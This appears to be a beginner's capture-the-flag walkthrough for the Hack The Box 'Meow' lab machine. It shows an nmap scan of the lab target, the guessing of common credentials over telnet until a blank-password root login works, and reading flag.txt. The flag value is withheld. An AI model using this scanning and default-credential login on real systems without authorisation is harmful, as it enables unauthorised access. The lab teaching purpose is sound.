The aim of this walkthrough is to provide help with the Meow machine on the Hack The Box website. Please note that no flags are directly provided here. Moreover, be aware that this is only one of the many ways to solve the challenges.
It belongs to a series of tutorials that aim to help out complete beginners with finishing the Starting Point TIER 0 challenges.
SETUP
There are a couple of ways to connect to the target machine. The one we will be using throughout this walkthrough is via the provided pwnbox.
Once our connection is taken care of, we spawn the target machine.
Additionally - even though not required - it is possible to set a local variable (only available in the current shell) containing our target host’s IP address. Once set, we can easily access it by prepending a $ to our variable name.
TASK 1
Question: What does the acronym VM stand for?
A simple internet search should suffice for this task.
virtual machine
TASK 2
Question: What tool do we use to interact with the operating system in order to issue commands via the command line, such as the one to start our VPN connection? It’s also known as a console or shell.
Same as before, use the internet.
terminal
TASK 3
Question: What service do we use to form our VPN connection into HTB labs?
There are multiple documents on the Hack The Box website describing the various ways you can connect to the target machine.
openvpn
TASK 4
Question: What is the abbreviated name for a ’tunnel interface’ in the output of your VPN boot-up sequence output?
One of the ways to figure that out, is to list all your network interfaces. You could do this with the ifconfig command.
tun
TASK 5
Question: What tool do we use to test our connection to the target with an ICMP echo request?
Quick search on the internet should get you the answer.
ping
TASK 6
Question: What is the name of the most common tool for finding open ports on a target?
Just like in the previous task, use the internet.
nmap
TASK 7
Question: What service do we identify on port 23/tcp during our scans?
Simply use nmap to scan the top 1000 ports on the target machine.
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $nmap 10.129.30.251
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-04 09:06 BST
Nmap scan report for 10.129.30.251
Host is up (0.064s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE
23/tcp open telnet
Nmap done: 1 IP address (1 host up) scanned in 0.80 seconds
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $
Only one port seems to be open:
telnet
TASK 8
Question: What username is able to log into the target over telnet with a blank password?
We can use the telnet command to connect to the service. Once connected, try out some common username:password pairs.
The first I tried user:password was a bust, but for the second, root:root, I did not even have to provide the password.
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $telnet 10.129.30.251 23
Trying 10.129.30.251...
Connected to 10.129.30.251.
Escape character is '^]'.
█ █ ▐▌ ▄█▄ █ ▄▄▄▄
█▄▄█ ▀▀█ █▀▀ ▐▌▄▀ █ █▀█ █▀█ █▌▄█ ▄▀▀▄ ▀▄▀
█ █ █▄█ █▄▄ ▐█▀▄ █ █ █ █▄▄ █▌▄█ ▀▄▄▀ █▀█
Meow login: user
Password:
Login incorrect
Meow login: root
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-77-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Thu 04 May 2023 08:16:35 AM UTC
System load: 0.0
Usage of /: 41.7% of 7.75GB
Memory usage: 4%
Swap usage: 0%
Processes: 138
Users logged in: 0
IPv4 address for eth0: 10.129.30.251
IPv6 address for eth0: dead:beef::250:56ff:fe96:247c
* Super-optimized for small spaces - read how we shrank the memory
footprint of MicroK8s to make it the smallest full K8s around.
https://ubuntu.com/blog/microk8s-memory-optimisation
75 updates can be applied immediately.
31 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Thu May 4 08:15:52 UTC 2023 on pts/0
root@Meow:~#
root
SUBMIT FLAG
Question: Submit root flag
Once we logged in via telnet, we will find ourselves with root privileges and in the root home directory.
Simply listing all the files in your directory will reveal the flag. Grab it, to continue.
root@Meow:~# ll
total 36
drwx------ 5 root root 4096 Jun 18 2021 ./
drwxr-xr-x 20 root root 4096 Jul 7 2021 ../
lrwxrwxrwx 1 root root 9 Jun 4 2021 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3132 Oct 6 2020 .bashrc
drwx------ 2 root root 4096 Apr 21 2021 .cache/
-rw-r--r-- 1 root root 33 Jun 17 2021 flag.txt
drwxr-xr-x 3 root root 4096 Apr 21 2021 .local/
-rw-r--r-- 1 root root 161 Dec 5 2019 .profile
-rw-r--r-- 1 root root 75 Mar 26 2021 .selected_editor
drwxr-xr-x 3 root root 4096 Apr 21 2021 snap/
root@Meow:~# cat flag.txt
<flag>
root@Meow:~#
flag
Make sure to terminate the target box before you continue with the next machine!